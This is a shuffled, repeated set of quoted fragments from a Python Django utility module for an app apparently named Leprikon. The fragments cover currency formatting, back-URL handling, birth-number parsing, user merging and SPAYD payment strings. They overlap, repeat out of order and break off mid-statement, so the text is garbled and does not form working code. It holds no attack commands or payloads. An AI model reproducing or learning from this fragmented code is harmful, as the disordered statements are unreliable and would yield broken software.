"= re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else:",
"+ s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes =",
"urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return",
"attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def",
"django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _",
"smb + (separated and \" \" or \"\") + s else: s =",
"0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def",
"return date(year, month, day) def get_age(birth_date, today=None): today = today or date.today() try:",
"= sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if",
"elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\",",
"== 1: s = sign + s elif sign_pos == 2: s =",
"= birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954",
"\">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0",
"0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated and",
"for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if",
"\")\" elif sign_pos == 1: s = sign + s elif sign_pos ==",
"def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return",
"int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today = today or date.today()",
"\"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc =",
"sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\")",
"import zlib from datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions",
"1: s = sign + s elif sign_pos == 2: s = s",
"= smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits and not",
"else: try: # try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except",
"from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import",
"return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else",
"\"p_sep_by_space\"] if precedes: s = smb + (separated and \" \" or \"\")",
"target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user = target",
"in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] +",
"and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"]",
"% (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s",
"except IndexError: pass else: try: # try to reuse original back url url_back",
"def _get_localeconv(): \"\"\" This function loads localeconv during module load. It is necessary,",
"by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency",
"or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated =",
"and \" \" or \"\") + s else: s = s + (separated",
"'<' and '>' are markers if the sign must be inserted between symbol",
"s else: s = s + (separated and \" \" or \"\") +",
"\").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits):",
"elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos == 4: s",
"integer values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1]",
"\"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode())",
"return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32,",
"s = s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign) else:",
"import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from",
"birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y =",
"attributes=None, exclude=[]): attributes = attributes or [f.name for f in source._meta.fields if f.name",
"merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and",
"= ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined )",
"from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError,",
"from django.utils.translation import ugettext_lazy as _ from .conf import settings MALE = \"m\"",
"if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\",",
"[ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else:",
"raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ):",
"= locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function is",
"= today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year",
"during module load. It is necessary, because using locale.setlocale later may be dangerous",
"between symbol and value s = \"<\" + s + \">\" smb =",
"> 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst)",
"else: return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s",
"v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text):",
"first_upper(s): return s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target, attributes=None,",
"1, 1) if birth_day_this_year > today: return today.year - birth_date.year - 1 else:",
"1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if",
"both users are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\",",
"original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back",
"string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in os.urandom(length)]])",
"else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for",
"tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all():",
"the most fitting sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\",",
"back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url",
"s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non",
"birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before",
"the default if nothing specified; # this should be the most fitting sign",
"necessary, because using locale.setlocale later may be dangerous (It is not thread-safe in",
"using locale.setlocale later may be dangerous (It is not thread-safe in most of",
"def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num",
"sign) elif sign_pos == 4: s = s.replace(\">\", sign) else: # the default",
"urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import",
"return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url,",
"from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" +",
"amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return",
"\"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated",
"= int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y < 54:",
"100 + y if y > date.today().year % 100: year -= 100 month",
"def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month,",
"- birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else \"\" def",
"s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s",
"target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined",
"\"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num):",
"and \" \" or \"\") + smb sign_pos = localeconv[val < 0 and",
"setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import",
"4: s = s.replace(\">\", sign) else: # the default if nothing specified; #",
"def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\", and",
"iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE",
"original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv()",
"from .conf import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\"",
"\"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif",
"return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return",
"== 3: s = s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\",",
"be the most fitting sign position s = sign + s return s.replace(\"<\",",
"current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get(",
"exclude] for attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr))",
"url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args,",
"+ y else: year = int(date.today().year / 100) * 100 + y if",
"day) def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year = date(today.year,",
"# grouping groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if",
"= settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for interval in",
"else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num)",
"sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if",
"- 1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:]",
"for f in source._meta.fields if f.name not in exclude] for attr in attributes:",
"= merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined",
"\"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp",
"target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi =",
"s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits and",
"> date.today().year % 100: year -= 100 month = int(birth_num[2:4]) % 50 %",
"== 9: # before 1954 if y < 54: year = 1900 +",
"y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y <",
"source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth",
"+ s + \")\" elif sign_pos == 1: s = sign + s",
"# This function is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats",
"import IntegrityError, transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri,",
"\"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined",
"transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from",
"**kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def",
"\"\") + s else: s = s + (separated and \" \" or",
"+ s else: s = s + (separated and \" \" or \"\")",
"auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def",
"+ s elif sign_pos == 2: s = s + sign elif sign_pos",
"except KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url,",
"= target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else:",
"str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\" %",
"\"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign must be inserted",
"\"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if",
"recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request))",
"get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: #",
"source.last_login and target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user",
"birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if",
"month, day) def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year =",
"digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and",
"# the default if nothing specified; # this should be the most fitting",
"parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return",
"standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency settings for",
"leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise for",
"function loads localeconv during module load. It is necessary, because using locale.setlocale later",
"smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or",
"def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: #",
"return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst):",
"return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK,",
"\"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for f",
"\"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not",
"errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\",",
") s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\",",
"int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y < 54: year",
"request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query",
"users are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\",",
"< 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated",
"attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration",
"= localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0",
"tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists():",
"lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i",
"= merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for",
"url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url url_back =",
"birth_date.month + 1, 1) if birth_day_this_year > today: return today.year - birth_date.year -",
"target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp,",
"s + (separated and \" \" or \"\") + smb sign_pos = localeconv[val",
"= localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb",
"year = 1800 + y else: year = int(date.today().year / 100) * 100",
"s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign) else: # the",
"= s + sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif",
"amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\",",
"smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits and not isinstance(val,",
"s + \")\" elif sign_pos == 1: s = sign + s elif",
"len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and",
"s elif sign_pos == 2: s = s + sign elif sign_pos ==",
"the sign must be inserted between symbol and value s = \"<\" +",
"reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive",
"target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise",
"language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for",
"attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr:",
"year = int(date.today().year / 100) * 100 + y if y > date.today().year",
"in exclude] for attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source,",
"if y < 54: year = 1900 + y else: year = 1800",
"s = s + sign elif sign_pos == 3: s = s.replace(\"<\", sign)",
"getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target",
"\"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) )",
"= date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return today.year -",
"if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer",
"string import unicodedata import zlib from datetime import date from urllib.parse import parse_qs,",
"and '>' are markers if the sign must be inserted between symbol and",
"return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) >",
"tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in",
"target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat",
"stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x",
"if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user =",
"non integer values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) +",
"merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi in",
"birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year",
"merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\"))",
"target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if",
"+ \")\" elif sign_pos == 1: s = sign + s elif sign_pos",
"if precedes: s = smb + (separated and \" \" or \"\") +",
"100) * 100 + y if y > date.today().year % 100: year -=",
"= \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv during",
"if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or",
"target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target,",
"and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"]",
"target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError:",
"mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass",
"tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for",
"reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1]",
"be inserted between symbol and value s = \"<\" + s + \">\"",
"smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign must",
"try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse",
"return lc localeconv = _get_localeconv() # This function is inspired by python's standard",
"smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val",
"localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb +",
"sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos == 4:",
"target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined",
"zlib from datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import",
"1954 if y < 54: year = 1900 + y else: year =",
"y if y > date.today().year % 100: year -= 100 month = int(birth_num[2:4])",
"0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def",
"precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val <",
"pass else: try: # try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0]",
"loads localeconv during module load. It is necessary, because using locale.setlocale later may",
"load. It is necessary, because using locale.setlocale later may be dangerous (It is",
"localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s =",
"or [f.name for f in source._meta.fields if f.name not in exclude] for attr",
"function is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according",
"urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction",
"target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user",
"\"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph =",
"+ string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in",
"exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if",
"> today: return today.year - birth_date.year - 1 else: return today.year - birth_date.year",
"\"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign",
"smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy",
"mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import",
"digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for interval",
"target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login",
"KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK:",
"source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save()",
"today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError:",
"pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\"",
"+ \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in",
"< 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\"",
"not thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name =",
"str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This",
"settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads",
"unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2:",
"= 1800 + y else: year = int(date.today().year / 100) * 100 +",
"and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"]",
"\"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp =",
"= target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user",
"be dangerous (It is not thread-safe in most of the implementations.) \"\"\" original_locale_name",
"return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def",
"except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise for attr",
"import locale import os import re import string import unicodedata import zlib from",
"def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if",
"get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for",
"or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else",
"for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: #",
"import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy",
"locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency settings for current",
"% 20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today",
"len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]:",
"source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save() except",
"RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" %",
"else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), )",
"s.replace(\">\", sign) else: # the default if nothing specified; # this should be",
"date.today().year % 100: year -= 100 month = int(birth_num[2:4]) % 50 % 20",
"def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if",
"% 50 % 20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date,",
"val according to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES #",
